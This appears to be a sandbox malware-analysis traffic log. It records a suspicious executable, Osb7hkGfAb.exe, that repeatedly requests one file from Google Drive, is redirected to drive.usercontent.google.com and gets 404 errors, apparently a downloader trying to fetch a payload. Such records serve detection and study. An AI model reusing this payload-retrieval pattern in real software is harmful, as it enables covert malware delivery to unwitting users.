Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.9 | 49715 | 142.250.184.206 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:55:03 UTC | 421 | OUT | GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
2025-01-10 14:55:03 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:03 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-ZpvlR13m5DhfSc8B1tSE8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.9 | 49716 | 216.58.206.33 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:55:04 UTC | 463 | OUT | GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
2025-01-10 14:55:04 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgQw9k5PSPHYoGsrDsuuse-WYQLdR1cbQHAaMkg6KwNM7OmtwCxzbc5qBUAOQ5qdvtgh1Tf9X48
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:04 GMT
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-OwO8ORBeJ2epaT6YjiGrjQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:04 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="j7sP2-9qSv62gLFnUb1tkA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                6 | 192.168.2.9 | 49717 | 142.250.184.206 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:05 UTC | 421 | OUT | GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:06 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:06 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: script-src 'nonce-w4pEgzhTJS-mYum7lCq2rg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                7 | 192.168.2.9 | 49718 | 216.58.206.33 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:06 UTC | 463 | OUT | GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:07 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFiumC4tzc24yzZPWi4Zdo8IjJ5RaZU4FGehLnWjnm-O-y_RJBpWVbVM3Iwa7NteBPeFaXu7ieKkJbI
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:07 GMT
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-GUqHkR93St__dVAqsdPTHw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:07 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UJFyUC8o5-JjPhCu8RMr_g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                8 | 192.168.2.9 | 49719 | 142.250.184.206 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:08 UTC | 421 | OUT | GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:08 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:08 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: script-src 'nonce-vQt8E9r9d9ZGCyqCcwKNdA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                9 | 192.168.2.9 | 49720 | 216.58.206.33 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:09 UTC | 463 | OUT | GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:09 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgQqrI4IVWBzUsNQSvKtxRIzBckrnSsKn8Csvr3rPIoUeivs7ZRs3nA6G9QyEvpYC61_
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:09 GMT
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-36pnhRGuC8USUQf-rt4aIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:09 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="k1WJyo7XV0nM-bnbjAMA7Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                10 | 192.168.2.9 | 49721 | 142.250.184.206 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:10 UTC | 421 | OUT | GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:10 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:10 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-5iI00T3CiolcCTiqCsHW5Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                11 | 192.168.2.9 | 49722 | 216.58.206.33 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:11 UTC | 463 | OUT | GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:11 UTC | 1843 | IN | HTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgRgZ3RkjCrev2TC2HEZqX0X_FWf6FSrblBlaJX1kZc9eJN-dePm_7mM8rXdIrICzJo
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:11 GMT
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: script-src 'nonce-KKXYcqXbDpC2lPjPfgcleg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:11 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="SwV4yZW7tE4sUZ-OnN2Avg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                12 | 192.168.2.9 | 49723 | 142.250.184.206 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:12 UTC | 421 | OUT | GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:13 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:12 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-cT8452utFY_3jQULAtoutw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
